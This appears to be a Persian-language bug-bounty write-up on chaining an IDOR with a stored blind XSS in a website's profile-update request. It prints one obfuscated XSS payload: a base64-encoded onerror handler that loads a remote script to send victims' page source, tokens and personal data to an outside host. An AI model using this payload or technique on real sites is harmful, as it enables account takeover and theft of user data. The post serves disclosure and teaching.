ترکیب آسیب پذیری IDOR و XSS


5/5 - (1 امتیاز)

به طور خلاصه اگر قرار باشد بررسی اجمالی به آسیب پذیری IDOR و XSS به همراه خطراتی که ایجاد میکند داشته باشیم، میتوانیم بگوییم:

  1. آسیب پذیری IDOR در سری درخواست هایی به هکر اجازه می‌ دهد تا روی حساب قربانی اثر بگذارد که معمولا با تغییر آیدی حساب هکر به قربانی در درخواست انجام می شود
  2. باگ XSS به منظور اجرای کد های Java Script در مرورگر قربانی هست که انواع مختلفی دارد، موردی که امروز بررسی می‌ کنیم Stored است که در Source مرورگر کاربر قرار میگیرد به صورت دائم و اجرا می‌ شود

در تابع های حساس سایت مثل آپدیت کردن پروفایل ممکن است این دو آسیب پذیری رخ دهد و در این مورد خاص به صورت همزمان هردو آسیب پذیری قابل Exploit هست که باعث Impact بالاتر حمله میشود.

ریکان این برنامه به صورتی بود که هر شرکتی که تحت حمایت این شرکت قرار دارد نیز در برنامه بانتی نیز می باشد. با استفاده از بررسی اخبار مربوطه این شرکت متوجه شدیم که شرکت جدیدی تحت حمایت این شرکت قرار گرفته است و بعد از پیدا کردن دامنه های مربوطه به شرکت وارد مرحله بررسی درخواست ها شدیم.

به درخواست بروز رسانی پروفایل توجه کنید. در این درخواست دو مقداری وجود دارد که توجه ما را جلب میکند. یکی data[User][id] که مقدار آیدی کاربر رو در خودش قرار داده و دیگری مقدار data[User][photo] که حاوی لینکی برای تصویر پروفایل ما هست.

مقدار پارامتر data[User][photo] به صورت src تگ image در Source صفحه برای عکس پروفایل کاربر قرار میگیرد. به این صورت:

<img src=https://victim.tld/image.png>

Payload مربوط به Blind XSS زیر برای ما این امکان رو ایجاد میکند که از Source صفحه کاربر برای ما یک کپی ارسال کند. این کپی حاوی Token های کاربران و اطلاعات حساس و شخصی کاربر است:

“><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbTdhcm1hbnhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

در قسمت پارامتر usrid مقدار آیدی حساب کاربر رو قرار میدهیم و مقدار پارامتر data[User][photo] رو با ایجاد BreaK Point و قرار دادن Exploit کد در ادامه لینک باعث میشد که کد های Java Script ما در حساب کاربر اجرا شود و اطلاعات حساس کاربر برای ما ارسال شود

بدون دیدگاه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.